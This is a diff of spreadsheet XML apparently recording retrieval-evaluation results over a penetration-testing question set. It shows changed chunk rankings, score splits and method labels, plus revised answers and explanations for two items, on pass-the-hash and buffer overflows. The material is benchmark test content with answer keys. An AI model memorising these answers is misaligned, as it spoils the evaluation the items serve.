+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I63" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J63" t="n">
@@ -4649,7 +4650,7 @@
       </c>
       <c r="K63" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4698,18 +4699,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I64" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J64" t="n">
@@ -4717,7 +4718,7 @@
       </c>
       <c r="K64" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4764,11 +4765,11 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9f7427dd-7d84-4217-88d8-469f2e60a674, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9f7427dd-7d84-4217-88d8-469f2e60a674, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 10)</t>
@@ -4776,7 +4777,7 @@
       </c>
       <c r="I65" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J65" t="n">
@@ -4784,7 +4785,7 @@
       </c>
       <c r="K65" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4832,18 +4833,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 3)
-cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 4)
+cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I66" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J66" t="n">
@@ -4851,7 +4852,7 @@
       </c>
       <c r="K66" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4897,20 +4898,20 @@
       <c r="H67" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 739fde19-f14a-4622-b924-63ae6c47cbde, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: de4bc05a-a8db-4d1a-83de-b5b2e148071c, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: af7f857c-8e24-45a8-9696-7c637642bf1f, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: af7f857c-8e24-45a8-9696-7c637642bf1f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I67" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J67" t="n">
@@ -4918,7 +4919,7 @@
       </c>
       <c r="K67" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4966,7 +4967,7 @@
           <t>preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
@@ -4977,7 +4978,7 @@
       </c>
       <c r="I68" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J68" t="n">
@@ -4985,7 +4986,7 @@
       </c>
       <c r="K68" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5020,7 +5021,7 @@
       <c r="F69" t="inlineStr">
         <is>
           <t>Answer: Pass-the-hash
-Explanation: Pass-the-hash attack is specifically designed to utilize a hash (like NTLM hash in Windows systems) to authenticate to other network resources without the need for the plain text password. This method exploits the way Windows handles authentication using hashed versions of user passwords. On the other hand, 'Pass-the-ticket' exploits Kerberos authentication, using stolen Kerberos tickets, not hash values.</t>
+Explanation: The most effective method for lateral movement in a Windows domain when an attacker has gained NTLM hash values is to use the 'Pass-the-hash' technique. This involves using the stolen hash values to authenticate to other network resources without needing the plain text password. Pass-the-ticket, while related to Kerberos authentication, does not involve NTLM hash values. Pass-the-cookie is relevant in web security contexts but is unrelated to NTLM or lateral movement in Windows domains. Man-in-the-middle attacks involve intercepting communications between two systems to capture or modify the data being exchanged, which does not directly apply to the scenario of authenticating with stolen hash values.</t>
         </is>
       </c>
       <c r="G69" t="inlineStr">
@@ -5032,19 +5033,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: eab6ace7-159e-4140-8209-e300bd81514c, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: aa428684-852d-4d02-bc06-338f87060720, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: aa428684-852d-4d02-bc06-338f87060720, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: dense, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 14d9e8e1-35a1-4d01-ba16-c065d548c347, Type: dense, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: f9bf9901-c3d6-4172-925b-486e460b1f29, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 7)
+cowWhySo-pentest-redteam-steering.md (Chunk: f9bf9901-c3d6-4172-925b-486e460b1f29, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 6b3589ca-f3ff-47e3-85e1-89c85c8b6914, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I69" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J69" t="n">
@@ -5052,7 +5053,7 @@
       </c>
       <c r="K69" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5101,17 +5102,17 @@
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I70" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J70" t="n">
@@ -5119,7 +5120,7 @@
       </c>
       <c r="K70" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5154,7 +5155,7 @@
       <c r="F71" t="inlineStr">
         <is>
           <t>Answer: Buffer Overflow
-Explanation: A buffer overflow occurs when more data is put into a fixed-length buffer than it can handle. This leads to the overflow of extra data into adjacent buffers, which can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. Cross-site Scripting (XSS) and SQL Injection vulnerabilities, in contrast, exploit the handling of input data to perform malicious actions within the user session or database respectively, without necessarily allowing arbitrary code execution on the server itself. Denial of Service (DoS) attacks rather aim to prevent legitimate users from accessing services by overwhelming the system with requests or other means, not directly involving arbitrary code execution on the server.</t>
+Explanation: A Buffer Overflow occurs when more data is put into a fixed-length buffer than it can handle. This leads to the overflow of extra data into adjacent buffers, which can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. Cross-site Scripting (XSS) and SQL Injection vulnerabilities, in contrast, exploit the handling of input data to perform malicious actions within the user session or database respectively, without necessarily allowing arbitrary code execution on the server itself. Denial of Service (DoS) attacks rather aim to prevent legitimate users from accessing resources by overwhelming the system with requests or other means, without necessarily involving arbitrary code execution on the server.</t>
         </is>
       </c>
       <c r="G71" t="inlineStr">
@@ -5168,17 +5169,17 @@
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0adf643c-3c85-44a4-ab1e-397efae38e4b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 5)
 cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I71" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J71" t="n">
@@ -5186,7 +5187,7 @@
       </c>
       <c r="K71" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5233,8 +5234,8 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 7)
@@ -5245,7 +5246,7 @@
       </c>
       <c r="I72" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J72" t="n">
@@ -5253,7 +5254,7 @@
       </c>
       <c r="K72" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5301,7 +5302,7 @@
           <t>preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: eab6ace7-159e-4140-8209-e300bd81514c, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
@@ -5312,7 +5313,7 @@
       </c>
       <c r="I73" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J73" t="n">
@@ -5320,7 +5321,7 @@
       </c>
       <c r="K73" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5367,19 +5368,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: e38f019f-1984-4b3a-b777-b4b078b00138, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: ea6341c8-0406-4563-802b-a1286b737502, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 821d649c-fe1a-45ff-9eb0-0916ba88ae25, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I74" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J74" t="n">
@@ -5387,7 +5388,7 @@
       </c>
       <c r="K74" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5434,19 +5435,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I75" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J75" t="n">
@@ -5454,7 +5455,7 @@
       </c>
       <c r="K75" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5507,13 +5508,13 @@
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I76" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J76" t="n">
@@ -5521,7 +5522,7 @@
       </c>
       <c r="K76" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5570,17 +5571,17 @@
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 8)
